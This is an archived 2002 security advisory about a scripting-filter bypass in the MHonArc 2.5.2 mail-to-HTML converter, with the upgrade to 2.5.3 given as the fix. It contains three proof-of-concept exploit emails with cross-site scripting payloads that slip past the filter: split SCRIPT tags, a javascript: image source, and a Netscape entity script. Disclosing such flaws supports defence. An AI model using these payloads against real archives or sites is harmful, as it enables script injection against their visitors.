TUCoPS :: Web :: Apps :: web5291.htm

MHonArc script filtering bypass vulnerability
19th Apr 2002 [SBWID-5291]
COMMAND

	MHonArc script filtering bypass vulnerability

SYSTEMS AFFECTED

	MHonArc v2.5.2

PROBLEM

	Hiromitsu Takagi reported following about MHonArc, a  Perl  mail-to-HTML
	converter. MHonArc provides HTML mail archiving with index, mail  thread
	linking, etc; plus other capabilities including  support  for  MIME  and
	powerful user customization features  (accordingly  with  their  website
	[http://www.mhonarc.org/]).
	

	

	MHonArc has a feature which filters out  scripting  tags  from  incoming
	HTML mails and it is enabled on default.  However,  some  variations  of
	scripting tags will not be filtered.
	

	

	Exploit 1:

	----------

	  From: test@example.com

	  To: test@example.com

	  Date: Sun, 16 Dec 2001 00:00:00 +0900

	  Subject: test

	  MIME-Version: 1.0

	  Content-Type: text/html

	  

	  <HTML>

	  <SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)</SCR<SCRIPT></SCRIPT>IPT>

	  </HTML>

	----------

	

	Exploit 2:

	----------

	  From: test@example.com

	  To: test@example.com

	  Date: Sun, 16 Dec 2001 00:00:00 +0900

	  Subject: test

	  MIME-Version: 1.0

	  Content-Type: text/html

	  

	  <HTML>

	  <IMG SRC=javascript:alert(document.domain)>

	  </HTML>

	----------

	

	Exploit 3:

	----------

	  From: test@example.com

	  To: test@example.com

	  Date: Sun, 16 Dec 2001 00:00:00 +0900

	  Subject: test

	  MIME-Version: 1.0

	  Content-Type: text/html

	  

	  <HTML>

	  <B foo=&{alert(document.domain)};>

	  Vulnerable only if Netscape 4.x is used to browse.</B>

	  </HTML>

	----------

	

SOLUTION

	Upgrade to MHonArc v2.5.3
	

	

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH